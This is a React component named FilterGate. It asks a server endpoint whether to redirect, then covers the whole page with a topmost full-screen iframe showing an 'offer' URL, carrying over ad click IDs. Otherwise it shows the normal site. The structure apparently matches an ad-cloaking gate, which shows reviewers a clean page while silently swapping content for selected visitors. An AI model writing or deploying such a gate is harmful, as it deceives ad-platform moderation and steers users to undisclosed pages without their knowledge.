import React, { useEffect, useMemo, useState } from 'react';

const PASS_THROUGH_PARAMS = new Set([
  'fbclid',
  'gclid',
  'ttclid',
  'twclid',
  'msclkid',
  'click_id',
]);

function buildOfferUrl(url, currentSearch) {
  const utms = new URLSearchParams();
  currentSearch.forEach((v, k) => {
    if (k.startsWith('utm_') || PASS_THROUGH_PARAMS.has(k)) utms.set(k, v);
  });
  const utmStr = utms.toString();
  if (!utmStr) return url;
  return url + (url.includes('?') ? '&' : '?') + utmStr;
}

export default function FilterGate({ children }) {
  const [offerUrl, setOfferUrl] = useState(null);
  const [checked, setChecked] = useState(false);

  const searchParams = useMemo(() => new URLSearchParams(window.location.search), []);

  useEffect(() => {
    let cancelled = false;

    async function run() {
      try {
        const res = await fetch('/api/filter-check', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: '{}',
        });

        if (!res.ok) return;
        const data = await res.json();
        if (cancelled) return;

        if (data?.action === 'redirect' && data?.url) {
          setOfferUrl(buildOfferUrl(String(data.url), searchParams));
        }
      } catch {
        // no-op
      } finally {
        if (!cancelled) setChecked(true);
      }
    }

    run();
    return () => {
      cancelled = true;
    };
  }, [searchParams]);

  if (offerUrl) {
    return (
      <iframe
        title="Offer"
        src={offerUrl}
        style={{
          position: 'fixed',
          top: 0,
          left: 0,
          width: '100%',
          height: '100%',
          border: 0,
          margin: 0,
          padding: 0,
          overflow: 'hidden',
          zIndex: 2147483647,
          background: '#000',
        }}
        allowFullScreen
      />
    );
  }

  if (!checked) return null;
  return children;
}

